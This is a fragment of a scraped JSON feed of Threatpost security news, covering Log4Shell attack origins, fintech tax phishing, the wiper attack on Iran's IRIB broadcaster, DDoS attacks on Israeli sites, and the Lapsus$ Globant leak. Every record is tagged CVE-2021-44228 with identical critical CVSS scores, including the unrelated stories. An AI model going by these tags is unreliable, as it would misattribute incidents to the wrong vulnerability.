**\n\nThe majority of [exploitation attempts against Log4Shell](<https://securelist.com/cve-2021-44228-vulnerability-in-apache-log4j-library/105210/>) originate in Russia, according to Kaspersky researchers who found 4,275 attacks launched from Russia, by far the most of any other region. By comparison, 351 attempts were launched from China and 1,746 from the U.S.\n\nSo far, the [Apache Log4j logging library exploit](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>) has spun off 60 mutations \u2014 and it only took less than a day.\n\nThis story is developing, so stay tuned to Threatpost for [additional coverage](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>).\n\n**_There\u2019s a sea of unstructured data on the internet relating to the latest security threats._**[ _REGISTER TODAY_](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)**_ to learn key concepts of natural language processing (NLP) and how to use it to navigate the data ocean and add context to cybersecurity threats (without being an expert!). This_**[ _LIVE, interactive Threatpost Town Hall_](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)**_, sponsored by Rapid 7, will feature security researchers Erick Galinkin of Rapid7 and Izzy Lazerson of IntSights (a Rapid7 company), plus Threatpost journalist and webinar host, Becky Bracken. \n_** \n[_**Register NOW**_](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)**_ for the LIVE event!_**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-13T19:00:01", "type": "threatpost", "title": "Where the Latest Log4Shell Attacks Are Coming From", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-13T19:00:01", "id": "THREATPOST:AFD74E86954C5A08B3F246887333BDF3", "href": "https://threatpost.com/log4shell-attacks-origin-botnet/176977/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-24T14:53:48", "description": "Threat actors have new targets in their sites this tax season during the annual barrage of cyber-scams as people file their U.S. income-tax documents. Novel email campaigns are spoofing popular financial technology (fintech) applications and their tax notifications to try to dupe victims into giving up their credentials, researchers have found.\n\nIt\u2019s common for attackers to target popular tax filing and preparation apps such as [Intuit](<https://threatpost.com/attackers-intuit-cancel-tax-accounts/178219/>) and TurboTax in various cybercriminal campaigns during tax season, a time that\u2019s traditionally rife with scams. In 2020, for example, threat actors [targeted small tax-preparation](<https://threatpost.com/latest-tax-scam-target-apps-and-tax-prep-websites/152998/>) firms by planting malicious code on their websites to spread malware to site users.\n\nThis year, attackers have pivoted to take on the personas of fintech apps like [Stash](<https://www.stash.com/>) and [Public](<https://public.com/>) \u201cto steal credentials and give users a false sense of security that they\u2019ve compiled the right tax documents,\u201d according to[ a report](<https://www.avanan.com/blog/hackers-begin-spoofing-fintech-apps-as-tax-season-approaches>) published Thursday by Avanan, a Check Point company.\n\nIn scams observed by Avanan researchers beginning in February, attackers spoof the logo and look and feel of communication that Stash and Public might send to end users to inform them that their tax document is ready, Jeremy Fuchs, Avanan cybersecurity researcher and analyst, wrote in the report.\n\nThe email includes a link to a document \u2013 purportedly associated with the person\u2019s Stash or Public account \u2013 and invites users to use the link to log in to their accounts to access it. When the user clicks on the link, however, they are directed not to a legitimate log-in site, but to one that harvests their credentials, Fuchs said.\n\n## **Rise in Fintech Threats**\n\nFintech is a growing attack surface for threat actors due to the sheer increase in its user base in the last couple of years, primarily attributed by researchers to the pandemic-related increase in people\u2019s overall time online.\n\nAccording to [a study](<https://plaid.com/blog/report-the-fintech-effect-2021/>) by fintech startup Plaid, 88 percent of people in the United States were using some form of fintech by late 2021 \u2013 a rise of 52 percent from the 58 percent of people who reported using fintech in 2020.\n\nSurprisingly, that\u2019s more than the number of people in the United States who use streaming services or social media, making fintech an attractive target for threat actors, Fuchs wrote. \u201cThat gives hackers a wide range of people to steal credentials from,\u201d he said.\n\nThreat actors began an early foray into targeting fintech users during tax season by targeting online investment service Robinhood [last April](<https://threatpost.com/robinhood-warns-customers-of-tax-season-phishing-scams/165180/>) in a similar way to this year\u2019s campaigns spoofing Stash and Public. At the time, researchers discovered an attack vector that used phishing emails with links to fake Robinhood websites prompting visitors to enter their login credentials.\n\n## **Catching Users Off Guard**\n\nFintech companies are also an attractive target because these types of scams can catch users by surprise, Fuchs noted.\n\n\u201cThey may not be expecting tax documents from these apps, inducing them to click,\u201d he wrote in the report. \u201cSince most of these services are mobile-first, users may receive this on their phone and may forget about typical cyber hygiene.\u201d\n\nOn the contrary, people should be at their most diligent when receiving any emails regarding tax forms or services, given that clicking on the wrong link, especially while connected to a corporate network, can have dire consequences, Fuchs said.\n\nTo keep networks safe during tax season, Avanan is advising security professionals\n\nto encourage end-users to check URLs before clicking on tax-related emails, as well as to ask users to log in directly to the financial institution when receiving tax-notification emails while at work. They also suggest security admins urge end-users to reach out to the company\u2019s IT department if they are unsure if an email is legitimate or not.\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-24T13:00:16", "type": "threatpost", "title": "Tax-Season Scammers Spoof Fintechs, Including Stash, Public", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-24T13:00:16", "id": "THREATPOST:4B8076F30D5D67336733D7FFBCBD929A", "href": "https://threatpost.com/tax-season-scammers-spoof-fintechs-stash-public/179071/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-18T15:37:47", "description": "Footage of opposition leaders calling for the assassination of Iran\u2019s Supreme Leader ran on several of the nation\u2019s state-run TV channels in late January after a state-sponsored cyber-attack on Iranian state broadcaster IRIB.\n\nThe incident \u2013 one of a series of politically motivated attacks in Iran that have occurred in the last year \u2013 included the use of a wiper that potentially ties it to a previous high-profile attack on Iran\u2019s national transportation networks in July, according to researchers from Check Point Research.\n\nHowever, though the earlier attacks have been attributed to [Iran state-sponsored actor Indra](<https://research.checkpoint.com/2021/indra-hackers-behind-recent-attacks-on-iran/>), researchers believe a copycat actor was behind the IRIB attack based on the malware and tools used in the attack, they said in a [report](<https://research.checkpoint.com/2022/evilplayout-attack-against-irans-state-broadcaster/>) published Friday.\n\n[](<https://bit.ly/34NwVmo>)\n\nClick to Register for FREE\n\n\u201cAmong the tools used in the attack, we identified malware that takes screenshots of the victims\u2019 screens, several custom-made backdoors, and related batch scripts and configuration files used to install and configure the malicious executables,\u201d researchers wrote in the report. \u201cWe could not find any evidence that these tools were used previously, or attribute them to a specific threat actor.\u201d\n\nThe disruptive attack on IRIB occurred on Jan. 27, with attackers showing a savviness and knowledge of how to infiltrate systems that suggest it may also have been an inside job, researchers said.\n\nThe attack managed to bypass security systems and network segmentation, penetrate the broadcaster\u2019s networks, and produce and run the malicious tools that relied on internal knowledge of the broadcasting software used by victims, \u201call while staying under the radar during the reconnaissance and initial intrusion stages,\u201d they noted.\n\nIndeed, nearly two weeks after the attack happened, new affiliated with opposition party MEK [published](<https://english.mojahedin.org/news/iran-despite-utilizing-all-resources-after-12-days-regimes-radio-and-tv-networks-have-not-returned-to-a-normal-status/>) a status report of the attack claiming that state-sponsored radio and TV networks still had not returned to normal, and that more than 600 servers, advanced digital production, archiving, and broadcasting of radio and television equipment have been destroyed, according to the report.\n\n## **Spate of Attacks**\n\nIran\u2019s national infrastructure has been the victim of a wave of attacks aimed at causing serious disruption and damage. Two incidents that targeted national transportation infrastructure occurred in two subsequent days in July.\n\nOne was a [rail-transportation incident](<https://threatpost.com/novel-meteor-wiper-used-in-attack-that-crippled-iranian-train-system/168262/>) \u2013 which disrupted rail service and also taunted Iran Supreme Leader Ayatollah Sayyid Ali Hosseini Khamenei via hacked public transit display screens. A day later, Iran\u2019s Ministry of Roads and Urban Development also [was hit with a cyber-attack](<https://www.reuters.com/world/middle-east/iran-transport-ministry-hit-by-second-apparent-cyberattack-days-2021-07-10/>) that took down employees\u2019 computer systems.\n\nThen in October, an attack on Iran\u2019s fuel-distribution network [stranded drivers](<https://threatpost.com/cyberattack-cripples-iranian-fuel-distribution-network/175794/>) at fuel pumps across the country by disabling government-issued electronic cards providing subsidies that many Iranians use to purchase fuel at discounted prices.\n\nCheck Point researchers analyzed tools in the IRIB cyber-attack and compared them with those of Indra, the group believed to be responsible for the previous attacks in Iran\u2019s infrastructure. Specifically, a novel wiper called Meteor \u2013 which not only wipes files but also can change users\u2019 passwords, disable screensavers, terminate processes and disable recovery mode, among other nefarious features \u2013 was used in both the railway and roads attacks.\n\nHowever, though a wiper was used against IRIB, it doesn\u2019t appear to be the same one. Nor are the threat actors behind it likely the same, though a copycat situation may be at play, researchers concluded.\n\n\u201cAlthough these wipers are coded and behave very differently, some implementation details such as execution based on batch files, or the password changing patterns ([random sequence]aA1! for this attack and Aa153![random sequence] in Indra\u2019s case), suggests that the attackers behind the IRIB hack may have been inspired by previous attacks [that] happened in Iran,\u201d they wrote in the report.\n\n## **Claiming Responsibility**\n\nIt\u2019s still unclear who, exactly, the perpetrators of the IRIB attack are, however. While Iranian officials believe the Iranian opposition political party MEK is behind the attack, the group itself has denied involvement, researchers said.\n\nFurther, hacktivist group Predatory Sparrow, which claimed responsibility for the previous three infrastructure attacks, also affiliated itself with the IRIB attack via its Telegram channel. However, this is unlikely, as \u201cno technical proof of the group\u2019s attribution to the attack has been discovered,\u201d according to Check Point.\n\nWhat is known about the threat actor, however, is that due to the relative complexity of the attack itself, the group \u201cmay have many capabilities that have yet to be explored,\u201d researchers noted.\n\nAt the same time, their reliance on IRIB insiders may have been the secret to the attackers\u2019 success, as the tools they used are of \u201crelatively low quality and sophistication, and are launched by clumsy and sometimes buggy 3-line batch scripts,\u201d according to Check Point.\n\n\u201cThis might support the theory that the attackers might have had help from inside the IRIB, or indicate a yet unknown collaboration between different groups with different skills,\u201d researchers noted.\n\n## **Specific Malware **\n\nWhile researchers said they are still not sure how the attackers gained initial access to IRIB networks, they managed to retrieve and analyze malware related to the later stages of the attack that did three things: established backdoors and their persistence, launched the video or audio track playing the assassination message, and installed the wiper to disrupt operations in the hacked networks.\n\nAttackers used four backdoor strategies in the attack: WinScreeny, HttpCallbackService, HttpService and ServerLaunch, a dropper launched with HttpService.\n\nWinScreeny is a backdoor with the main purpose of capturing screenshots of the victim\u2019s computer. HttpCallbackService is a remote-administration tool (RAT) that communicates with the command-and-control (C2) server every five seconds to receive commands to execute. HttpService is a backdoor that listens on a specified port and can execute commands, manipulate local files, download or upload files, or perform other malicious activities.\n\nFinally, the ServerLaunch dropper \u2013 which starts both httpservice2 and httpservice4, each of which has a different predefined port to listen on \u2013 likely allows the attackers to ensure some sort of redundancy of the C2 communication, researchers wrote.\n\n## **Hijacking the Video Stream**\n\nTo interrupt the TV stream and play the opposition\u2019s message, attackers used a program called SimplePlayout.exe, a .NET-based executable with a single functionality: to play a video file in a loop using the .NET MPlatform SDK by Medialooks.\n\nTo kill the video stream already playing so they could deploy their own, the attackers used a batch script called playjfalcfgcdq.bat, which killed the running process and deleted the executable of TFI Arista Playout Server, a software that the IRIB is [known](<http://rd.irib.ir/documents/25760057/f39f659c-8a0b-42f3-a1e9-d716cd5b8afe>) to use for broadcasting.\n\nAttackers connected the dots with a script, layoutabcpxtveni.bat, that made the necessary connections to replace the IRIB video content with their own through a series of functions, including the launch of SimplePlayout.exe, researchers wrote.\n\n## **The Wiper**\n\nIn analyzing the wiper used in the attacks, researchers found \u201ctwo identical .NET samples named msdskint.exe whose main purpose is to wipe the computer\u2019s files, drives, and MBR,\u201d they reported.\n\nThe malware also has the capability to clear Windows Event Logs, delete backups, kill processes and change users\u2019 passwords, among other features.\n\nTo corrupt files, the wiper has three modes: default, which overwrites the first 200 bytes of each chunk of 1024 bytes with random values; light-wipe, which overwrite a number of chunks specified in the configuration; and full_purge, which does just that \u2013 overwrites the entire file content.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-18T13:46:04", "type": "threatpost", "title": "Iranian State Broadcaster Clobbered by \u2018Clumsy, Buggy\u2019 Code", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-18T13:46:04", "id": "THREATPOST:BE11CFFFFEA1B470C8A24CA24D76A7C6", "href": "https://threatpost.com/iranian-state-broadcaster-clumsy-buggy-code/178524/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-15T20:03:19", "description": "Israel\u2019s Nation Cyber Directorate confirmed in a tweet on Monday that a denial-of-service (DDoS) attack against a telecommunications provider took down several government sites, as well as others not affiliated with the government. The incident led to the Directorate to briefly declare a state of emergency, while sources said the [cyberattack was the largest ever against Israel](<https://www.haaretz.com/israel-news/.premium-israeli-government-sites-crash-in-cyberattack-1.10674433>).\n\n\u201cUpdate: In the last few hours, a [DDoS] attack has been identified on a communications provider which, as a result, has for a short time prevented access to a number of sites, including government sites,\u201d the Cyber Israel account tweeted.\n\nHaaretz reported the sites for the Israeli departments of interior, health, justice, welfare and even the Prime Minister\u2019s office were taken offline (services are now restored). A source identified by Haaretz as a member of the \u201cdefense establishment\u201d noted the size of the attack, adding that only a nation-state backed threat actor could have pulled off such a large-scale attack.\n\nInternet tracker NetBlocks reported that the attacks were launched against Israeli telecom providers Bezeq and Cellcom.\n\n> \u2139\ufe0f Update: The [#Israel](<https://twitter.com/hashtag/Israel?src=hash&ref_src=twsrc%5Etfw>) Government Network (Tehila Project, AS8867) which hosts several gov\u00b7il website domains has become unreachable internationally. Users within the country remain able to access the platforms.\n> \n> \ud83d\udcf0 Further Reading: <https://t.co/zgeodgMzk1> [pic.twitter.com/YAHSf63Wun](<https://t.co/YAHSf63Wun>)\n> \n> \u2014 NetBlocks (@netblocks) [March 14, 2022](<https://twitter.com/netblocks/status/1503465330315825152?ref_src=twsrc%5Etfw>)\n\nMeanwhile, cybersecurity watchers and experts suspect Iran was behind the attack.\n\n\u201cThe recent DDoS attacks against Israel have been attributed to actors aligned with Iran, highlighting the significant ongoing tensions between the two countries,\u201d Chris Morgan, senior cyber-threat intelligence analyst with Digital Shadows, told Threatpost by email.\n\nHe said the timing indicates the DDoS attacks were in retaliation for Israel\u2019s attempt to breach Iran\u2019s nuclear infrastructure, Morgan explained.\n\n\u201cThe attacks occurred just hours after Iranian state television announced that its security forces had reportedly stopped an attempted sabotage of nuclear centrifuges against a nuclear power plant in Fordow,\u201d he said. \u201cAttacking nuclear centrifuges draws parallels to previous cyberattacks against Iran, notably the Stuxnet incident of 2010; some have suggested this destructive malware attack was the work of Israel\u2019s intelligence services.\u201d\n\n## **Israel, Uniquely Prepared to Defend Against Cyberattacks **\n\nIsrael is known to have engaged in covert cybersecurity operations across the globe. Jennifer Tisdale, CEO of GRIMM, told Threatpost \u2014 including developing the [Stuxnet worm](<https://threatpost.com/stuxnet-apts-gossip-girl/143595/>) that was deployed against Iran. As a result the country is prepared to respond to attacks on its own systems, she said, adding that it\u2019s an approach the U.S. government should adopt.\n\n\u201cToday\u2019s broad cyberattack is just another Tuesday in Israel, for the most part,\u201d Tisdale said. \u201cIsrael\u2019s approach to cybersecurity offers some solid takeaways the U.S. government could and should embrace.\u201d\n\nIt starts with smart government policymaking, she added.\n\n\u201cFirst, Israel has developed cybersecurity public policy that is both robust and nimble,\u201d Tisdale said. \u201cThey have prioritized government funding specific to cyberattack mitigation, preparation and response to protect against other governments or private sector incidents.\u201d\n\nAlso, \u201ccybercriminals also face stiff consequences for their actions against Israeli interests,\u201d Tisdale said.\n\n\u201cIsrael has also embraced an attacker-oriented response strategy and has developed a practice for holding people and organizations accountable with both national and international law enforcement,\u201d she added. \u201cThough we could debate what an appropriate response should look and feel like, I believe we can all agree that having a cyber-response plan and accountability plan to protect U.S. critical infrastructure, government networks and communication systems should be prioritized.\u201d\n\nThough the size of the attack is notable, DDoS attacks in general are common against nations and should be anticipated, Netenrich principal threat hunter John Bambenek told Threatpost.\n\n\u201cUltimately, DDoS attacks remain a technique to knock critical infrastructure, such as government websites, offline,\u201d Bambenek said. \u201cThe technique is popular among activists because it doesn\u2019t require much in the way of prep work to pull off. Government targets, such as the Israeli government, are common.\u201d\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists. _**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-15T19:47:39", "type": "threatpost", "title": "Cyberattacks Against Israeli Government Sites: 'Largest in the Country\u2019s History'", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-15T19:47:39", "id": "THREATPOST:03FC9E97BBF9730C5990E8A220DD5E9A", "href": "https://threatpost.com/cyberattacks-israeli-government-sites-largest/178927/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-30T17:35:11", "description": "The Lapsus$ data extortionists are back from a week-long \u201cvacation,\u201d they announced on Telegram, posting ~70GB worth of data purportedly stolen from software development giant Globant.\n\n\u201cWe are officially back from a vacation,\u201d the gang wrote on their Telegram channel, posting images of exfiltrated data and admin credentials. The credentials, purportedly belonging to Globant\u2019s customers, unlock several of the company\u2019s Atlassian suite DevOps platforms, including GitHub, Jira, Confluence and the Crucible code-review tool.\n\nThe shared, 70GB torrent file purportedly also contains Globant\u2019s source code, as well as the Atlassian admin passwords. Security researchers shared the images today, on Wednesday.\n\nScreenshots show a folder directory of what looks like scads of companies from across the world, including tech bigwigs Arcserve, Facebook, the Apple Health app, DHL, Citibank, BNP Paribas Cardiff and Citibanamex, among others: just a teaser of the Globant data Lapsus$ has promised to leak.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/30111855/Lapsus_Globant_leak-e1648653558836.jpg>)\n\nA teaser of the Globant data Lapsus$ said it was about to leak. Source: Telegram.\n\n> This is bad with all the keys, codes and damaging databases to go through to find corporate exposure and liability and to secure digital assets. <https://t.co/FHcs88V3nM>\n> \n> \u2014 Dominic Alvieri (@AlvieriD) [March 30, 2022](<https://twitter.com/AlvieriD/status/1509174961822486538?ref_src=twsrc%5Etfw>)\n\nThe folders could be evidence of client data having been exposed, or they might just refer to Globant backups. But Lapsus$ followed up by posting a 718.8KB torrent file to Telegram \u2013 a file that allegedly contains the leaked data. The post says: \u201cLeak of some customers source code from Globant[.]com corp GHE and GHE.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/30113855/Lapsus-followup-torrent-file-e1648654747345.jpg>)\n\nFollowup torrent file posted to Lapsus$\u2019s Telegram channel. Source: Telegram.\n\nBut as GovInfoSecurity [pointed out](<https://www.govinfosecurity.com/despite-arrests-lapsus-adds-globant-to-victim-list-a-18813>), even if Globant\u2019s source code wasn\u2019t directly affected, the source code of the software it provides to its customers may be.\n\n## About Those Admin Credentials\n\nVx-underground \u2013 an internet collection of malware source code, samples and papers \u2013 cited security researcher Dominic Alvieri in tweeting that Lapsus$ threw Globant\u2019s sysadmins \u201cunder the bus\u201d by exposing their passwords to Confluence and other DevOps platforms.\n\nThat shouldn\u2019t come as a surprise: It\u2019s not like the data extortion group has a collection of kid gloves. It has, rather, slapped around the likes of [Brazil\u2019s Ministry of Health](<https://www.zdnet.com/article/brazilian-ministry-of-health-suffers-cyberattack-and-covid-19-vaccination-data-vanishes/>), the gaming giant [Ubisoft](<https://www.toolbox.com/it-security/security-general/news/lapsus-ubisoft-security-incident/>), [Portuguese media kingpin](<https://threatpost.com/portuguese-media-giant-impresa-ransomware/177323/>) Impresa, and, in recent weeks, eviscerated tech giants including [Samsung](<https://threatpost.com/samsung-lapsus-ransomware-source-code/178791/>), [Nvidia](<https://threatpost.com/nvidias-stolen-code-signing-certs-sign-malware/178784/>), [Microsoft](<https://threatpost.com/microsoft-lapsus-compromised-one-employees-account/179048/>) and [Okta](<https://threatpost.com/lapsus-data-kidnappers-claim-snatches-from-microsoft-okta/179041/>).\n\nVx-underground censored those admin passwords, but its whiteout treatment can\u2019t hide the fact that the passwords were pretty stubby and, hence, [pretty guessable](<https://threatpost.com/euros-football-fever-dumb-passwords/166974/>), as well as being [reused](<https://threatpost.com/threatlist-people-know-reusing-passwords-is-dumb-but-still-do-it/155996/>). \u201cWe have censored the passwords they displayed. However, it should be noted these passwords are very easily guessable and used multiple times,\u201d the collection noted.\n\n> LAPSUS$ also threw their System Admins under the bus exposing their passwords to confluence (among other things). We have censored the passwords they displayed. However, it should be noted these passwords are very easily guessable and used multiple times\u2026 [pic.twitter.com/gT7skg9mDw](<https://t.co/gT7skg9mDw>)\n> \n> \u2014 vx-underground (@vxunderground) [March 30, 2022](<https://twitter.com/vxunderground/status/1509015154930896899?ref_src=twsrc%5Etfw>)\n\nIn fact, after reviewing the admin passwords, GovInfoSecurity found that a similar-looking password was reused for the Confluence and Jira platforms, while the one used for GitHub \u201cappears similar to ones on the list of[ 200 most commonly used passwords](<https://nordpass.com/most-common-passwords-list/>).\u201d\n\n## So Much for the Arrests\n\nLapsus$\u2019s \u201cvacation\u201d may have been in Tahiti, for all we know, or it may have been time spent reshuffling. At any rate, last week, the City of London Police [arrested](<https://threatpost.com/uk-cops-collar-7-suspected-lapsus-gang-members/179098/>) seven people suspected of being connected to the gang.\n\nThe bust came within hours of Bloomberg having published a [report](<https://www.bloomberg.com/news/articles/2022-03-23/teen-suspected-by-cyber-researchers-of-being-lapsus-mastermind?sref=ylv224K8>) about a teenage boy living at his mother\u2019s house near Oxford, England who\u2019s suspected of being the Lapsus$ mastermind. The police didn\u2019t verify whether or not they nabbed the Oxford teen, per se, but given that he\u2019s a minor, they legally couldn\u2019t divulge that detail anyway.\n\nAll of the suspects arrested by London police were released, but the law isn\u2019t going to let up.\n\nAs of a week ago, March 21, the FBI had slapped Lapsus$ onto its [Most Wanted](<https://www.fbi.gov/wanted/seeking-info/lapsus>) list.\n\n\u201cOn March 21, 2022, individuals from a group identifying themselves as Lapsus$ posted on a social media platform and alleged to have stolen source code from a number of United States-based technology companies,\u201d the FBI said. \u201cThese unidentified individuals took credit for both the theft and dissemination of proprietary data that they claim to have illegally obtained. The FBI is seeking information regarding the identities of the individuals responsible for these cyber intrusions.\u201d\n\nKen Westin, director, security strategy at Cybereason, told Threatpost on Wednesday that Lapsus$\u2019s quick resurface after its short hiatus isn\u2019t surprising, given the fact that cybercriminal networks are often spread around the world.\n\n\u201cCybercrime groups, like hacktivist groups, often work in a decentralized fashion, with many members not even knowing each other\u2019s true identities,\u201d he said via email. \u201cThe fact this group is made up of members in many different countries presents challenges for law enforcement as they will need to collaborate with different countries with varying levels of capabilities to go after the perpetrators.\u201d\n\nWestin noted that the Globant breach \u201cseems a bit different on the surface,\u201d given that the resources that were allegedly compromised were around Globant\u2019s DevOps processes. It raises the question of where the initial compromise was and what Lapsus$ did with the access. Wha\u201dt is also concerning regarding this compromise is that potential source code for some of their customers appears to have been exposed and Lapsus$ is going after organizations via Globant\u2019s technology and now services partners,\u201d he added.\n\n033022 12:40 UPDATE: Added input from Ken Westin.\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-30T16:29:10", "type": "threatpost", "title": "Lapsus$ \u2018Back from Vacation\u2019", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-30T16:29:10", "id": "THREATPOST:38E044431D55F0A4BC458FF92EB025BF", "href": "https://threatpost.com/lapsus-back-from-vacation/179156/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-10T14:12:32", "description": "You hate to blame the victim, but the fact of the matter is that businesses are just asking to get whacked with ransomware multiple times.\n\nA recent [study](<https://www.extrahop.com/company/press-releases/2022/cyber-confidence-index-2022/>) of IT leaders from cloud-native network detection and response firm ExtraHop shows that businesses aren\u2019t even aware of the \u201cattack me,\u201d \u201ceasy prey\u201d pheromones they\u2019re giving off: In fact, there\u2019s a yawning chasm between perception and reality.\n\nThe study shows that corporate leaders have a false sense of security when it comes to their 